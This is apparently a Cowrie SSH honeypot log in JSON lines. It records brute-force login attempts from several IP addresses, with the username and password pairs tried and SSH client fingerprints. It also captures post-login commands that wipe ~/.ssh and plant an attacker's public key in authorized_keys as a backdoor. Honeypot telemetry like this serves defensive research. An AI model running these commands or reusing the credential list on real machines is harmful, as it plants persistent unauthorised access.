{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34774,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc9754c330dd","protocol":"ssh","message":"New connection: 212.227.125.160:34774 (1.2.3.4:22) [session: bc9754c330dd]","sensor":"my-vps","timestamp":"2025-08-28T03:22:47.100666Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:22:47.101570Z","src_ip":"212.227.125.160","session":"bc9754c330dd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:22:47.317056Z","src_ip":"212.227.125.160","session":"bc9754c330dd"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123456","message":"login attempt [app/app123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:22:47.965908Z","src_ip":"212.227.125.160","session":"bc9754c330dd"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:49.183453Z","src_ip":"212.227.125.160","session":"bc9754c330dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:22:49.855135Z","src_ip":"194.233.79.134","session":"6213c82f515f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:22:49.855821Z","src_ip":"194.233.79.134","session":"6213c82f515f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45662,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e7d682f69ac","protocol":"ssh","message":"New connection: 212.227.235.229:45662 (1.2.3.4:22) [session: 7e7d682f69ac]","sensor":"my-vps","timestamp":"2025-08-28T03:22:49.890751Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:22:49.891629Z","src_ip":"212.227.235.229","session":"7e7d682f69ac"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:22:50.138775Z","src_ip":"212.227.235.229","session":"7e7d682f69ac"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:50.587311Z","src_ip":"194.233.79.134","session":"6213c82f515f"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:50.588729Z","src_ip":"194.233.79.134","session":"6213c82f515f"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123456","message":"login attempt [app/app123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:22:50.882153Z","src_ip":"212.227.235.229","session":"7e7d682f69ac"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:52.131889Z","src_ip":"212.227.235.229","session":"7e7d682f69ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46108,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d5e0d19acca","protocol":"ssh","message":"New connection: 212.227.235.229:46108 (1.2.3.4:22) [session: 7d5e0d19acca]","sensor":"my-vps","timestamp":"2025-08-28T03:22:52.289243Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:22:52.297871Z","src_ip":"212.227.235.229","session":"7d5e0d19acca"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:22:52.391799Z","src_ip":"212.227.235.229","session":"7d5e0d19acca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45216,"dst_ip":"1.2.3.4","dst_port":22,"session":"360cd078a949","protocol":"ssh","message":"New connection: 212.227.125.160:45216 (1.2.3.4:22) [session: 360cd078a949]","sensor":"my-vps","timestamp":"2025-08-28T03:22:52.843677Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:22:52.844295Z","src_ip":"212.227.125.160","session":"360cd078a949"}
{"eventid":"cowrie.login.success","username":"root","password":"Vps12345","message":"login attempt [root/Vps12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:22:52.913573Z","src_ip":"212.227.235.229","session":"7d5e0d19acca"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:22:53.060269Z","src_ip":"212.227.125.160","session":"360cd078a949"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:22:53.241762Z","src_ip":"212.227.235.229","session":"7d5e0d19acca"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T03:22:53.242359Z","src_ip":"212.227.235.229","session":"7d5e0d19acca"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T03:22:53.243762Z","src_ip":"212.227.235.229","session":"7d5e0d19acca"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:53.450898Z","src_ip":"212.227.235.229","session":"7d5e0d19acca"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:22:53.562030Z","src_ip":"212.227.235.229","session":"7d5e0d19acca"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T03:22:53.562748Z","src_ip":"212.227.235.229","session":"7d5e0d19acca"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T03:22:53.652852Z","src_ip":"212.227.235.229","session":"7d5e0d19acca"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:53.653690Z","src_ip":"212.227.235.229","session":"7d5e0d19acca"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic123","message":"login attempt [elastic/elastic123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:22:53.710896Z","src_ip":"212.227.125.160","session":"360cd078a949"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46109,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c5ef29524f7","protocol":"ssh","message":"New connection: 212.227.235.229:46109 (1.2.3.4:22) [session: 4c5ef29524f7]","sensor":"my-vps","timestamp":"2025-08-28T03:22:53.744083Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:22:53.744970Z","src_ip":"212.227.235.229","session":"4c5ef29524f7"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:22:53.846234Z","src_ip":"212.227.235.229","session":"4c5ef29524f7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T03:22:54.257581Z","src_ip":"212.227.235.229","session":"4c5ef29524f7"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:54.929262Z","src_ip":"212.227.125.160","session":"360cd078a949"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:55.361835Z","src_ip":"212.227.235.229","session":"4c5ef29524f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52781,"dst_ip":"1.2.3.4","dst_port":22,"session":"0839a354e118","protocol":"ssh","message":"New connection: 212.227.235.229:52781 (1.2.3.4:22) [session: 0839a354e118]","sensor":"my-vps","timestamp":"2025-08-28T03:22:55.421924Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T03:22:55.422547Z","src_ip":"212.227.235.229","session":"0839a354e118"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46110,"dst_ip":"1.2.3.4","dst_port":22,"session":"89dc2c001b7a","protocol":"ssh","message":"New connection: 212.227.235.229:46110 (1.2.3.4:22) [session: 89dc2c001b7a]","sensor":"my-vps","timestamp":"2025-08-28T03:22:55.453501Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:22:55.454352Z","src_ip":"212.227.235.229","session":"89dc2c001b7a"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:22:55.544114Z","src_ip":"212.227.235.229","session":"89dc2c001b7a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T03:22:55.550339Z","src_ip":"212.227.235.229","session":"0839a354e118"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:22:55.969437Z","src_ip":"212.227.235.229","session":"89dc2c001b7a"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:56.071001Z","src_ip":"212.227.235.229","session":"7d5e0d19acca"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:56.071804Z","src_ip":"212.227.235.229","session":"89dc2c001b7a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"111111","message":"login attempt [admin/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T03:22:56.146872Z","src_ip":"212.227.235.229","session":"0839a354e118"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin2","message":"login attempt [admin/admin2] failed","sensor":"my-vps","timestamp":"2025-08-28T03:22:57.277224Z","src_ip":"212.227.235.229","session":"0839a354e118"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":16645,"dst_ip":"1.2.3.4","dst_port":22,"session":"f802728a31af","protocol":"ssh","message":"New connection: 45.125.211.194:16645 (1.2.3.4:22) [session: f802728a31af]","sensor":"my-vps","timestamp":"2025-08-28T03:22:57.722920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:22:57.730805Z","src_ip":"45.125.211.194","session":"f802728a31af"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:22:57.931284Z","src_ip":"45.125.211.194","session":"f802728a31af"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1q2w3e4r5t","message":"login attempt [admin/1q2w3e4r5t] failed","sensor":"my-vps","timestamp":"2025-08-28T03:22:58.406871Z","src_ip":"212.227.235.229","session":"0839a354e118"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-28T03:22:58.761726Z","src_ip":"45.125.211.194","session":"f802728a31af"}
{"eventid":"cowrie.login.failed","username":"admin","password":"QgZDQCK0WUiUYiu","message":"login attempt [admin/QgZDQCK0WUiUYiu] failed","sensor":"my-vps","timestamp":"2025-08-28T03:22:59.537298Z","src_ip":"212.227.235.229","session":"0839a354e118"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:59.970909Z","src_ip":"45.125.211.194","session":"f802728a31af"}
